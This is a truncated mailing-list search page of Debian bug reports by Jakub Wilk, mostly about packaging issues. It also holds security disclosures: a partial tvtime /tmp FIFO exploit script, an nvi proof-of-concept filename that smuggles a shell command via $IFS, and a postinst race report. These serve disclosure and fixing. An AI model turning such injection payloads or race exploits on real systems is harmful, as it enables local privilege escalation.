Source: mingetty
Version: 1.08-4
Severity: wishlist
Please add
Homepage: https://sourceforge.net/projects/mingetty/
to debian/control.
--
Jakub Wilk
have made sense in 1990s when login(1) was changing ownership of
/dev/vcsaN devices to the logged in user; but it doesn't serve any
purpose these days. Please drop it.
-- System Information:
Architecture: i386
Versions of packages mingetty depends on:
ii libc6 2.34-7
--
Jakub Wilk
* Santiago Vila , 2019-11-21, 13:55:
you seem to be the upstream author,
Indeed.
would you consider adopting it?
No. Sorry!
--
Jakub Wilk
* Thorsten Glaser , 2019-10-08, 13:57:
setting effective gid to 32767: Invalid argument at /usr/bin/adequate
line 1070.
That's probably #941985.
--
Jakub Wilk
"put the fifo in
$HOME" in src/utils.c), to this should be a matter of disabling the /tmp
codepath.
--
Jakub Wilk
hed a proof-of-concept exploit.
--
Jakub Wilk
#!/bin/sh
set -e -u
if ! command -v xeyes > /dev/null
then
printf 'xeyes(1) not found. Please install x11-apps.\n' >&2
exit 1
fi
cd /tmp
basedir=$(mktemp -d tvtime-exploit.XX)
chmod 755 "$basedir"
mkfifo -m 644 &qu
Package: tvtime
Version: 1.0.11-4
The first item in the FILES section of the tvtime(1) manual page is:
/tvtime/tvtime.xml
This file doesn't exist of course. I think it should be:
/etc/tvtime/tvtime.xml
--
Jakub Wilk
. If you want to run multiple SSL servers with one lighttpd
instance you must use IP-based virtual hosting
This is no longer true. Lighttpd supports SNI since 1.4.24.
--
Jakub Wilk
0.2.35-15
Versions of packages zapping recommends:
pn gconf2
--
Jakub Wilk
;.
PoC exploit:
$ echo 'X-vi-recover-path: /etc/fstab' >
'/var/tmp/vi.recover/recover.moo;z=$(pwd|head${IFS}-c1);apt-get${IFS}moo>${z}tmp${z}pwned'
--
Jakub Wilk
Control: forwarded -1 https://github.com/merces/pev/pull/110
I've forwarded the patch upstream.
--
Jakub Wilk
patch seems to fix this, too.
--
Jakub Wilk
--- a/src/output.c
+++ b/src/output.c
@@ -288,7 +288,7 @@
scope->depth = scope_depth + 1;
if (scope_depth > 0) {
- output_scope_t * const parent_scope = NULL;
+ output_scope_t * parent_scope = NULL;
STACK_PEEK(g_scope_stack,
e",
scope_type=OUTPUT_SCOPE_TYPE_OBJECT) at output.c:293
#1 0x56556f42 in main (argc=, argv=) at
pehash.c:557
-- System Information:
Architecture: i386
Versions of packages pev depends on:
ii libc62.24-12
ii libssl1.0.2 1.0.2l-2
--
Jakub Wilk
* Jakub Wilk , 2016-09-20, 10:35:
$ vlock -as
vlock: loading plugin 'nosysrq' failed: Permission denied
It turns out that after upgrading from -6 to -7 I'm no longer in the group
vlock. :-O
And that's apparently because -6's postrm removes the vlock gro
24-3
ii libpam-modules 1.1.8-3.3
ii libpam0g 1.1.8-3.3
--
Jakub Wilk
x27;m okay with
relicensing.
--
Jakub Wilk
(so that users could check too) so that the location should
implicitly still be valid.
No, there's no such requirement.
--
Jakub Wilk
rm-size-perl 0.207-1+b3
ii perl5.22.1-9
Versions of packages acheck recommends:
ii liblocale-gettext-perl 1.07-1+b1
ii libtext-aspell-perl 0.09-1.1+b1
--
Jakub Wilk
x 4.3.0-1-amd64 (SMP w/2 CPU cores)
Locale: LANG=C, LC_CTYPE=pl_PL.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: sysvinit (via /sbin/init)
Versions of packages 9base depends on:
ii libc6 2.22-0experimental1
--
Jakub Wilk
/usr/share/doc/libmeanwhile-dev/samples/build
An example diff between i386 and amd64 (after ungzipping) is attached.
--
Jakub Wilk
diff -ur
libmeanwhile-dev_1.0.2-7_i386/usr/share/doc/libmeanwhile-dev/samples/Makefile
libmeanwhile-dev_1.0.2-7_amd64/usr/share/doc/libmeanwhile-dev/sample
Source: ekg2
Version: 1:0.4~pre+20120506.1-10
Tags: patch
--
Jakub Wilk
diff --git a/debian/copyright b/debian/copyright
--- a/debian/copyright
+++ b/debian/copyright
@@ -317,7 +317,7 @@
plugins/sniff/sniff_gg.h contains code:
(C) Copyright 2001-2003 Wojtek Kaniewski
- Robert J
, LC_CTYPE=pl_PL.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: sysvinit (via /sbin/init)
Versions of packages arc depends on:
ii libc6 2.19-13
--
Jakub Wilk
traversal.arc
Description: Binary data
Source: arc
Version: 5.21q-1
Tags: patch
I rebuilt the package with DEB_BUILD_OPTIONS=nostrip, but the resulting
binary package was still stripped.
The attached patch seems to fix it.
--
Jakub Wilk
--- a/Makefile
+++ b/Makefile
@@ -132,8 +132,8 @@
rm -rf .dist
install: all
- install -s
TF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: sysvinit (via /sbin/init)
Versions of packages arc depends on:
ii libc6 2.19-13
--
Jakub Wilk
crash.arc
Description: Binary data
linked to /bin/dash
Init: sysvinit (via /sbin/init)
Versions of packages rzip depends on:
ii libbz2-1.0 1.0.6-7+b2
ii libc6 2.19-13
--
Jakub Wilk
crash.rz
Description: Binary data
* Jakub Wilk , 2014-11-28, 23:19:
nvi does this in postinst:
if [[ -L /var/tmp/vi.recover || \
-e /var/tmp/vi.recover && ! -d /var/tmp/vi.recover ]]; then
echo "Cannot create recovery directory /var/tmp/vi.recover" 1>&2
exit 1
fi
[ -d /var/tmp
1
fi
[ -d /var/tmp/vi.recover ] || mkdir -p /var/tmp/vi.recover
chown root:root /var/tmp/vi.recover
chmod 1777 /var/tmp/vi.recover
This is racy.
If there is no symlink protection enabled
(/proc/sys/fs/protected_symlinks), malicious local user could trick this
code into chmodding arbitra
86_64)
Foreign Architectures: amd64
Kernel: Linux 3.14-1-amd64 (SMP w/2 CPU cores)
Locale: LANG=C, LC_CTYPE=pl_PL.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Versions of packages vlock depends on:
ii adduser 3.113+nmu3
ii libc6 2.19-5
ii libpam-modules 1.1.8-3
ii lib
tween i386 and amd64 is attached.
--
Jakub Wilk
diff -ur libmilter1.0.1_8.14.4-6_i386/usr/share/bug/libmilter1.0.1/script
libmilter1.0.1_8.14.4-6_amd64/usr/share/bug/libmilter1.0.1/script
--- libmilter1.0.1_8.14.4-6_i386/usr/share/bug/libmilter1.0.1/script
2014-05-24 13:37:38.0
l.so.1.0.0]
0x0001 (NEEDED) Shared library: [libreadline.so.6]
--
Jakub Wilk
--
To UNSUBSCRIBE, email to debian-qa-packages-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Archive: http://lists.debian.org/20131009075717.ga5...@jwilk.net
ot;i" and
"I" are different letters, so your fix wouldn't work in tr_TR locales.
--
Jakub Wilk
--
To UNSUBSCRIBE, email to debian-qa-packages-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Archive: http://lists.debian.org/20131004134540.ga8...@jwilk.net
n moved to
/usr/lib/${DEB_HOST_MULTIARCH}/.
--
Jakub Wilk
--
To UNSUBSCRIBE, email to debian-qa-packages-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Archive: http://lists.debian.org/20130605153844.ga5...@jwilk.net
g
file is architecture-dependent:
/usr/share/doc/libreadline5/examples/Makefile
MD5 sums of the file in question:
e33b87dd84e70cd693653c2b189d8938 s390 s390x
c303c0dc61bd38a0da565bfb235e4795 elsewhere
An example diff between i386 and s390 is attached.
--
Jakub Wilk
diff -ur
libreadline-gplv2-de
/cache/apt/archives/libreadline-gplv2-dev_5.2+dfsg-1_i386.deb
A diff between i386 and amd64 is attached.
--
Jakub Wilk
diff -ur
libreadline-gplv2-dev_5.2+dfsg-1_i386/usr/share/doc/libreadline5/examples/Makefile
libreadline-gplv2-dev_5.2+dfsg-1_amd64/usr/share/doc/libreadline5/example
Source: libvigraimpex
Version: 1.7.1+dfsg1-3
Severity: minor
Tags: patch
Please see the attached patch.
--
Jakub Wilk
--- a/test/sampler/test.cxx
+++ b/test/sampler/test.cxx
@@ -387,7 +387,7 @@
/* when sampling k times without replacement
the probability p of a sample not being
* Jakub Wilk , 2013-01-24, 23:48:
from gi.repository import Gtk
import _gtk
The last line should read:
from import _gtk
Third time lucky:
from gtk import _gtk
--
Jakub Wilk
--
To UNSUBSCRIBE, email to debian-qa-packages-requ...@lists.debian.org
with a subject of "unsubscribe"
m all. :/)
3) Make libgtk2 and libgtk3 use symbol versioning. Probably not
something that would be accepted for wheezy. :/
--
Jakub Wilk
--
To UNSUBSCRIBE, email to debian-qa-packages-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@
doing that are rather dubious (for this
particular package). Thanks for the upload.
--
Jakub Wilk
--
To UNSUBSCRIBE, email to debian-qa-packages-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Archive: http://lists.debian.org/201
s
are not suitable for main:
http://www.debian.org/vote/2006/vote_001
--
Jakub Wilk
--
To UNSUBSCRIBE, email to debian-qa-packages-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Archive: http://lists.debian.org/20121212175535.ga9...@jwilk.net
in a row"
doesn't sound like a good reason to close it.
--
Jakub Wilk
--
To UNSUBSCRIBE, email to debian-qa-packages-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Archive: http://lists.debian.org/20120801121518.ga5...@jwilk.net
regardless of whether the entered password was correct or
not?
--
Jakub Wilk
--
To UNSUBSCRIBE, email to debian-qa-packages-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Archive: http://lists.debian.org/20120527195359.ga2...@jwilk.net
fixed 674616 1:0.6-2
thanks
* Cyril Brulebois , 2012-05-26, 02:04:
due to the new libextractor (#672117), your package is no longer
installable, since it has:
| Depends: ${misc:Depends}, ${python:Depends}, libextractor1c2a
This appears to be fixed in experimental.
--
Jakub Wilk
--
To
k (with
deprecation warnings), but Python 2.7 throws an exception instead.
--
Jakub Wilk
--
To UNSUBSCRIBE, email to debian-qa-packages-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Archive: http://lists.debian.org/20120509140747.ga8...@jwilk.net
Package: libxslt1-dev
Version: 1.1.26-11
User: multiarch-de...@lists.alioth.debian.org
Usertags: multiarch
libxslt1-dev is marked as "Multi-Arch: same", but contents of
/usr/bin/xslt-config is diffent on kfreebsd-* than on other
architectures. Please see the attached diff.
--
Jakub
.
--
Jakub Wilk
--
To UNSUBSCRIBE, email to debian-qa-packages-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Archive: http://lists.debian.org/20120507221704.ga2...@jwilk.net
clear; the change I made was to add a Depends to the
resultant binary package, and nothing which could have introduced this
problem.
Right, the previous version FTBFS, too.
--
Jakub Wilk
--
To UNSUBSCRIBE, email to debian-qa-packages-requ...@lists.debian.org
with a subject of "unsubscribe
declare
tight dependency on the version for which the extensions was built.
--
Jakub Wilk
--
To UNSUBSCRIBE, email to debian-qa-packages-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Archive: http://lists.debian.org/20120314
e and therefore
should be using a kernel which doesn't have the bug.
Please re-enable test suite on armel.
--
Jakub Wilk
--
To UNSUBSCRIBE, email to debian-qa-packages-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debi
ort this if it was a user error, so that a better error
message can be provided next time.
| Either send bugs to the mailing list at
<http://groups.google.com/group/sphinx-dev/>,
| or report them in the tracker at
<http://bitbucket.org/birkenfeld/sphinx/issues/>. Thanks!
| make[1]:
files when they were still
accessible.
However, even chmod'ing files won't help if the attacker is keeping (one
of) them open. You'd have to truncate the files and unlink them.
Implementing this would be probably overkill, though.
--
Jakub Wilk
--
To UNSUBSCRIBE, em
* Jakub Wilk , 2012-02-10, 00:05:
$ ls -ld ~/.surf/{,cookies.txt}
drwxr-xr-x 2 user users 4096 Feb 9 22:59 /home/user/.surf/
-rw-r--r-- 1 user users 406 Feb 9 22:59 /home/user/.surf/cookies.txt
CVE-2012-0842 was assigned to this bug.
--
Jakub Wilk
--
To UNSUBSCRIBE, email to debian-qa
pango1.0-0 1.29.4-2
ii libsoup2.4-12.34.3-1
ii libwebkitgtk-1.0-0 1.6.1-5+b1
ii libx11-62:1.4.4-4
ii suckless-tools 38-1
ii wget1.13.4-2
ii x11-utils 7.6+4
ii xterm 276-2
--
Jakub Wilk
--
To UNSUBSCRIBE, email to debian-q
kbox&arch=sparc64&ver=0.70.1-6&stamp=1324032630
--
Jakub Wilk
--
To UNSUBSCRIBE, email to debian-qa-packages-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Archive: http://lists.debian.org/20111217183433.ga3...@jwilk.net
;stamp=1323405479
--
Jakub Wilk
--
To UNSUBSCRIBE, email to debian-qa-packages-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Archive: http://lists.debian.org/20111209131553.ga4...@jwilk.net
eplacement libbt ...
Errors were encountered while processing:
/var/cache/apt/archives/libbt0_0.70.1-4_amd64.deb
E: Sub-process /usr/bin/dpkg returned an error code (1)
--
Jakub Wilk
--
To UNSUBSCRIBE, email to debian-qa-packages-requ...@lists.debian.org
with a subject of "unsubscribe&quo
Package: blackbox
Version: 0.70.1-4
Severity: serious
Justification: Policy 4.9
The binary-indep target doesn't build the "libbt" package.
--
Jakub Wilk
--
To UNSUBSCRIBE, email to debian-qa-packages-requ...@lists.debian.org
with a subject of "unsubscribe".
I ask you what was the point on introducing symbol files in the
first place?
--
Jakub Wilk
--
To UNSUBSCRIBE, email to debian-qa-packages-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Archive: http://lists.debian.org/201
.
--
Jakub Wilk
--
To UNSUBSCRIBE, email to debian-qa-packages-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Archive: http://lists.debian.org/2014130218.ga2...@jwilk.net
the above instructions and file a gcc bug.
I reproduced the bug on merulo. I'll file a bug against gcc-4.6 in a
moment.
In the mean time, reducing optimization level from -O3 to -O2 can be
used to work around the compiler bug.
--
Jakub Wilk
--
To UNSUBSCRIBE, email
5894 2011-10-26 04:04
./usr/share/locale/es_ES/LC_MESSAGES/.mo
--
Jakub Wilk
--
To UNSUBSCRIBE, email to debian-qa-packages-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Archive: http://lists.debian.org/20111028183515.ga3...@jwilk.net
Source: snowdrop
Version: 0.02b-10
Severity: wishlist
Sometimes applying watermark turns a UTF-8 text into a text that is not
valid UTF-8 text any more. I'd nice UTF-8-ness were always preserved.
--
Jakub Wilk
--
To UNSUBSCRIBE, email to debian-qa-packages-requ...@lists.debian.org
w
Source: snowdrop
Version: 0.02b-10
Severity: minor
Please see the attached patch.
--
Jakub Wilk
diff --git a/debian/control b/debian/control
--- a/debian/control
+++ b/debian/control
@@ -12,7 +12,7 @@
Architecture: any
Depends: ${shlibs:Depends}, ${misc:Depends}
Description: plain text
Source: jrexx
Version: 1.1.1-6
Severity: serious
Justification: Policy 3.3
There's a typo in the Maintainer field:
Maintainer: Debian QA Group
(note the missing "s" before @).
--
Jakub Wilk
--
To UNSUBSCRIBE, email to debian-qa-packages-requ...@lists.debian.org
wi
The maintainer
N:must update the debian/.symbols file by adding the new symbols
N:with the corresponding upstream version.
N:
N:Severity: important, Certainty: certain
N:
N:Check: shared-libs, Type: binary, udeb
N:
--
Jakub Wilk
--
To UNSUBSCRIBE, email to debian-qa-pack
tions to make a test pass is not much
better than disabling the test entirely.
Shouldn't GCC be fixed instead to make -mieee the default?
--
Jakub Wilk
--
To UNSUBSCRIBE, email to debian-qa-packages-requ...@lists.debian.org
with a subject of "unsubscribe". Trou
-camelot with
recent dh_python2.
--
Jakub Wilk
--
To UNSUBSCRIBE, email to debian-qa-packages-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Archive: http://lists.debian.org/20110809202557.ga4...@jwilk.net
n-xlwt 0.7.2+debian1-2 module for reading/writing Microso
ii python2.62.6.7-4 An interactive high-level object-o
ii tango-icon-theme 0.8.90-5Tango icon theme
Versions of packages python-camelot suggests:
pn python-camelot-doc
I don't think your patch applies cleanly:
404 Not Found
Not Found
The requested URL /~iwamatsu/libpng/patches/exactimage_0.8.5-1.patch was not found
on this server.
Apache Server at people.debian.org Port 80
:P
--
Jakub Wilk
--
To UNSUBSCRIBE, email to debian-qa-packages
Processing triggers for man-db ...
Errors were encountered while processing:
/var/cache/apt/archives/python-django-authority_0.4-1_all.deb
E: Sub-process /usr/bin/dpkg returned an error code (1)
I don't think it's appropriate for either of packages to ship a Python
module with such a generic na
Source: snes9x
Version: 1:1.5-1
Severity: serious
Tags: sid wheezy
snes9x build-depends on x-dev, which was a transitional package and it
no longer exists in sid.
--
Jakub Wilk
--
To UNSUBSCRIBE, email to debian-qa-packages-requ...@lists.debian.org
with a subject of "unsubscribe"
rptime
(data_string, format))
ValueError: time data 'Jan 11 23:40:52' does not match format '%b %d
%H:%M:%S'
Thanks for the bug report. Could you check if the attached patch fixes
all the locale problems for you?
--
Jakub Wilk
Description: Set LC_TIME locale to C, so that tim
be optional, it's just nobody
tested it:
| try:
| import gnomecanvas
| except gnomecanvas:
| print "Warning: You don't have gnome-canvas (or its python bindings)
installed."
| print " The happy timing diagram will be disabled."
| gnomecanvas = None
't do that then! :)
As far as I can tell, currently all the pages are rendered and loaded to
memory (if they fit, which is usually not the case) but only the first
one is actually OCRed.
--
Jakub Wilk
--
To UNSUBSCRIBE, email to debian-qa-packages-requ...@lists.debian.org
with a subject
* Dmitry Katsubo , 2010-10-01, 12:47:
I have fired a request at cuneiform bugtracker:
https://bugs.launchpad.net/cuneiform-linux/+bug/652883
I hope .a will be available as well (usually it is not a big deal).
Why do you need a static library in the first place?
--
Jakub Wilk
signature.asc
tags 598616 + confirmed help
thanks
Fixing this bug is non-trivial and I don't currently have time to work
on it. However, I will be happy to accept a patch if you provide one.
--
Jakub Wilk
signature.asc
Description: Digital signature
duces a
security hole on systems where you install the package.”
--
Jakub Wilk
signature.asc
Description: Digital signature
it's related to this configure
check:
checking for X app-defaults directory... /usr/lib/X11/app-defaults
--
Jakub Wilk
signature.asc
Description: Digital signature
Package: twlog
Version: 2.5-3
Severity: important
twlog installs defaults files into /usr/lib/X11/app-defaults/. This is
violation of policy 11.8.6.
--
Jakub Wilk
signature.asc
Description: Digital signature
t takes
care of installing documentation, but the binary-arch (run by
autobuilders) doesn't.
--
Jakub Wilk
signature.asc
Description: Digital signature
Source: p2c
Version: 1.21alpha2-3
Severity: important
non-i386 binaries don't ship manpages nor examples:
$ dpkg -c p2c_1.21alpha2-3_i386.deb | grep -cE '/(doc|man)/'
19
$ dpkg -c p2c_1.21alpha2-3_amd64.deb | grep -cE '/(doc|man)/'
7
--
Jakub Wilk
signature
: zero-byte-file-in-doc-directory
usr/share/doc/netstat-nat-1.4.10/NEWS.gz
--
Jakub Wilk
signature.asc
Description: Digital signature
Package: rezound
Version: 0.12.3beta-3
Severity: normal
Translation files are missing on some architectures:
$ dpkg -c rezound_0.12.3beta-3+b1_i386.deb | grep -Fc .mo
5
$ dpkg -c rezound_0.12.3beta-3+b1_amd64.deb | grep -Fc .mo
0
--
Jakub Wilk
signature.asc
Description: Digital signature
tags 593486 + patch
thanks
* Jakub Wilk , 2010-08-18, 17:29:
yagiuda fails to build from source on mips[0] and mipsel[1] (likely
because of bug #519006):
| mips-linux-gnu-gcc -Wall -g -O2 -o yagi yagi.o fill_v_vector.o
get_number_of_elements.o getfiles.o nrutil.o string.o
sel&ver=1.19-6.2&stamp=1277099656
--
Jakub Wilk
signature.asc
Description: Digital signature
.cfg.log("xclip must be installed for yank to work!")
else:
wait() will never be called if a user has PYTHONOPTIMIZE=1 set in
his enviroment.
--
Jakub Wilk
signature.asc
Description: Digital signature
Package: canto
Version: 0.7.6-2
Severity: normal
$ man canto-inspect
No manual entry for canto-inspect
See 'man 7 undocumented' for help when manual pages are not available.
--
Jakub Wilk
signature.asc
Description: Digital signature
tags 588348 + patch
thanks
* Sascha Silbe ,
2010-07-07, 12:17:
offlineimap calls critical code paths only via assert.
I attach an ugly, untested work-around for this bug.
--
Jakub Wilk
diff -Nru offlineimap-6.2.0.2/bin/offlineimap offlineimap-6.2.0.3/bin/offlineimap
--- offlineimap-6.2.0.2
Package: offlineimap
Version: 6.2.0.2
Severity: wishlist
Tags: patch
Hello,
The attached patch implements work-around for bug in Python 2.6
(#586433, “curses fails to restore terminal settings”).
--
Jakub Wilk
diff -Nru offlineimap-6.2.0.1/offlineimap/ui/__init__.py offlineimap-6.2.0.2
ser a
ii yum 3.2.25-1 Advanced front-end for rpm
--
Jakub Wilk
signature.asc
Description: Digital signature
/os/repodata/c9f35fdd3fa196a5ed5d9257fccfe8832ade88eb35d3e0e7d6006b473b260794-primary.sqlite.bz2:
[Errno 14] PYCURL ERROR 7 - ""
Versuche anderen Spiegel-Server.
--
Jakub Wilk
signature.asc
Description: Digital signature
?&pkg=knoda&ver=0.8.3-4%2Bb1&arch=i386&stamp=1276840418&file=log
[2]
https://buildd.debian.org/fetch.cgi?&pkg=knoda&ver=0.8.3-4%2Bb1&arch=s390&stamp=1276830624&file=log
--
Jakub Wilk
signature.asc
Description: Digital signature
-opost -onlcr
-isig -icanon -iexten -echo -echoe -echok
-echoctl -echoke
--
Jakub Wilk
#!/usr/bin/python
from curses import wrapper
def dummy
Package: cuneiform
Version: 0.7.0+dfsg-1
Severity: serious
cuneiform_src/Kern/rout/wtypes.h is claimed to be BSD-licensed, but it's
"Copyright 1992 - 1998 Microsoft Corporation." Somehow I doubt that
Microsoft really released this code under BSD license.
--
Jakub Wilk
/root
/usr/lib/python-support/megahal/python2.5/megahal-9.0.3.egg-info
-rw-r--r-- root/root /usr/lib/python-support/megahal/python2.5/mh_python.so
-rwxr-xr-x root/root DEBIAN/prerm
--
Jakub Wilk
signature.asc
Description: Digital signature
oncard-doc/samples/jabberChat/jabberChat.py", line 21, in
from connection import JabberConnection
ValueError: invalid \x escape
--
Jakub Wilk
signature.asc
Description: Digital signature
re/doc/galternatives/changelog.gz
-rw-r--r-- root/root 356 2006-05-17 14:45
./usr/share/doc/galternatives/copyright
-rw-r--r-- root/root 472 2004-06-15 00:04
./usr/share/doc/galternatives/TODO
(Yes, this is *python2.3*!)
--
Jakub Wilk
signature.asc
Description: Digital signature
ory
| dh_install: cp -a ./debian/tmp/usr/bin/tla_load_dirs
debian/tla-load-dirs/usr/bin/ returned exit code 1
If you need help with fixing this bug, don't hesitate to ask on
#debian-python or debian-pyt...@lists.debian.org.
--
Jakub Wilk
signature.asc
Description: Digital signature
sr/lib/pythonX.Y/dist-packages. In fact, packages shipping files in
/usr/lib/python2.6/site-packages will break installation of
python2.6-minimal.
If you need help with fixing this bug, don't hesitate to ask on
#debian-python or debian-pyt...@lists.debian.org.
--
Jakub Wilk
signature.asc
tobj/usr/lib/python2.6/site-packages/EditObj-0.5.7-py2.6.egg-info
| mv debian/python-editobj/usr/lib/python*/site-packages/editobj/icons \
| debian/python-editobj/usr/share/python-editobj
| mv: cannot stat
`debian/python-editobj/usr/lib/python*/site-packages/editobj/icons': No
^^
Oh, right, somehow I missed that. Thanks for pointing that out!
--
Jakub Wilk
signature.asc
Description: Digital signature
1 - 100 of 110 matches
Mail list logo